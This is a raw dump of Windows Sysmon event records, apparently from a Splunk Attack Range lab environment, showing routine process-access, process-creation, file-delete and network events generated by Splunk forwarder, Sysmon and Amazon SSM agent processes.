09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978107Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978106Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978105Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978104Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8A0A-6151-AC79-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978103Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A0A-6151-AC79-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978102Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.537{69CF5F33-8A0A-6151-AC79-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978101Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.410{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DA165A6E06722DF0956DDF202B1C0DC,SHA256=35CF59B64611F373027E5EEE8C8005F14FA65CF15A5601CD79D590D63C734DDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:26.382{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA420891345CE751D1AF5F28054A6E9,SHA256=66EA7748C762993059B8CA93E6EE230D27D3C637DE97FDBFF0517F3280735D47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978100Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.097{69CF5F33-8A09-6151-AB79-00000000FD01}37202336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000978099Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.003{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8224CFCD78FC70B24E7DB2F8379FD2A6,SHA256=703D33ADDC4627C883B09CE907B1704512E4F041D5D51C86C0183C1DF5C3DFD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:26.149{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4304MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978145Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:24.788{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59345-false10.0.1.12-8000- 10341000x8000000000000000978144Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.878{69CF5F33-8A0B-6151-AE79-00000000FD01}1096932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978143Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A0B-6151-AE79-00000000FD01}1096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978142Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978141Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978140Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978139Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978138Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978137Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978136Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978135Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8A0B-6151-AE79-00000000FD01}1096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978134Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978133Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978132Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.691{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A0B-6151-AE79-00000000FD01}1096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978131Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.678{69CF5F33-8A0B-6151-AE79-00000000FD01}1096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978130Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.675{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=632F2C8E9E73EF12DCAFC57872EB62FA,SHA256=F49282B2ECFEF332F1B6586B454899CDEDC394AD421A4EA0F6DD613C8E1F7BBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978129Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.675{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA0520C43FE4ADFF6ABAAAF273C18D72,SHA256=4182015471BD56C06DF0E7226F7054D03E38C196A836EE07F95ED8D7230947C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:27.396{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BE922ED3A089BB06B58AFD39B9963B,SHA256=95FDB6B5BC6DD67BFDF83B758C4C5730F80C8A25B79E8E6659577033B534BBA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978128Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A0B-6151-AD79-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978127Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 